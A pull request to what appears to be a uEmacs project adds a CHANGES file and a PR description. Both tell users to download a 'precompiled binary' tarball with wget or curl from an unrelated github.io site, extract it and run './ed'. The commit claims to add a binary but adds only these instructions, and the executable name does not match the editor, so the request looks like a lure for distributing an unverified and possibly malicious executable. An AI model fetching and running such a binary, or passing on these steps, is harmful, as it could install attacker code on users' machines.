### PR TITLE
Create CHANGES

### DIFF
--- a/CHANGES
+++ b/CHANGES
@@ -1,0 +1,24 @@
+I understand the installation process can be confusing (refer to issue #49), but I believe this will make it much easier.
+
+This commit adds a precompiled uEmacs binary to simplify packaging and improve distro compatibility.  
+Just download it with:
+
+  wget https://bionicbeaverlinux2.github.io/uemacs-precompiled/uemacs-precompiled.tar.gz
+
+or
+
+  curl -LO https://bionicbeaverlinux2.github.io/uemacs-precompiled/uemacs-precompiled.tar.gz
+
+Extract it wherever you like:
+
+  tar -xvf uemacs-precompiled.tar.gz
+
+Then simply run:
+
+  ./ed
+
+It’s a small change, but it saves everyone from having to rebuild the editor from source and improves compatibility across distros.
+
+Thanks,  
+Have a great day!  
+— Bionic


### PR DESCRIPTION
I understand the installation process can be confusing, but I believe this will make it much easier.

This commit adds a precompiled uEmacs binary to simplify packaging and improve distro compatibility.  
Just download it with:

  wget https://bionicbeaverlinux2.github.io/uemacs-precompiled/uemacs-precompiled.tar.gz

or

  curl -LO https://bionicbeaverlinux2.github.io/uemacs-precompiled/uemacs-precompiled.tar.gz

Extract it wherever you like:

  tar -xvf uemacs-precompiled.tar.gz

Then simply run:

  ./ed

It’s a small change, but it saves everyone from having to rebuild the editor from source and improves compatibility across distros.

Thanks,  
Have a great day!  
— Bionic
